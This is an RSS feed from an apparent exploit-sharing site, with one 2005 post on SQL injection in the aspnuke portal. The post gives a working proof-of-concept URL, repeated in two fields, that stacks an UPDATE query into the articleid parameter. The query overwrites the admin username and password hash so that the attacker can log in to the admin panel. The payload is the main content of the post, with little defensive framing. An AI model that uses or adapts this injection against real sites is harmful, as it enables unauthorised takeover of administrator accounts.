<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Exploits and Security &#187; Nuke Products</title>
	<atom:link href="http://www.exploitx.com/category/exploits-and-bugs/nuke-products/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.exploitx.com</link>
	<description>Technology &#38; Security Tips &#38; Guides</description>
	<lastBuildDate>Tue, 22 Dec 2009 03:28:49 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>aspnuke is vulnerable to sql injection</title>
		<link>http://www.exploitx.com/35/aspnuke-is-vulnerable-to-sql-injection/</link>
		<comments>http://www.exploitx.com/35/aspnuke-is-vulnerable-to-sql-injection/#comments</comments>
		<pubDate>Thu, 30 Jun 2005 09:00:20 +0000</pubDate>
		<dc:creator>Exploitx</dc:creator>
				<category><![CDATA[Exploits and Bugs]]></category>
		<category><![CDATA[Nuke Products]]></category>

		<guid isPermaLink="false">http://www.exploitx.com/35/aspnuke-is-vulnerable-to-sql-injection/</guid>
		<description><![CDATA[*******description*********
aspnuke is web portal system written in asp .
site : www.aspnuke.com
********POC************
It&#8217;s possible to inject htttp://host/module/article/article/article.asp?articleid=1&#8242;
for example you can change the admin username and password with this querry :
http://host/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password=&#8217;bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c&#8217; , username=&#8217;trapset&#8217;%20where%20userID=1%20&#8211;
this will change both username and password to trapset
and then you can login to the admin&#8217;s conntrol panel from www.example.com/module/admin
********************
remember aspnuke is quiet diffrent from asp-nuke
********************

This [...]]]></description>
			<content:encoded><![CDATA[<p>*******description*********<br />
aspnuke is web portal system written in asp .<br />
site : www.aspnuke.com</p>
<p>********POC************<br />
It&#8217;s possible to inject htttp://host/module/article/article/article.asp?articleid=1&#8242;<br />
for example you can change the admin username and password with this querry :<br />
http://host/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password=&#8217;bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c&#8217; , username=&#8217;trapset&#8217;%20where%20userID=1%20&#8211;<br />
this will change both username and password to trapset<br />
and then you can login to the admin&#8217;s conntrol panel from www.example.com/module/admin</p>
<p>********************<br />
remember aspnuke is quiet diffrent from asp-nuke<br />
********************</p>
<div style="float: left;"><!--adsense--></div>
<p>This bug discovered by oil_karchack</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploitx.com/35/aspnuke-is-vulnerable-to-sql-injection/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
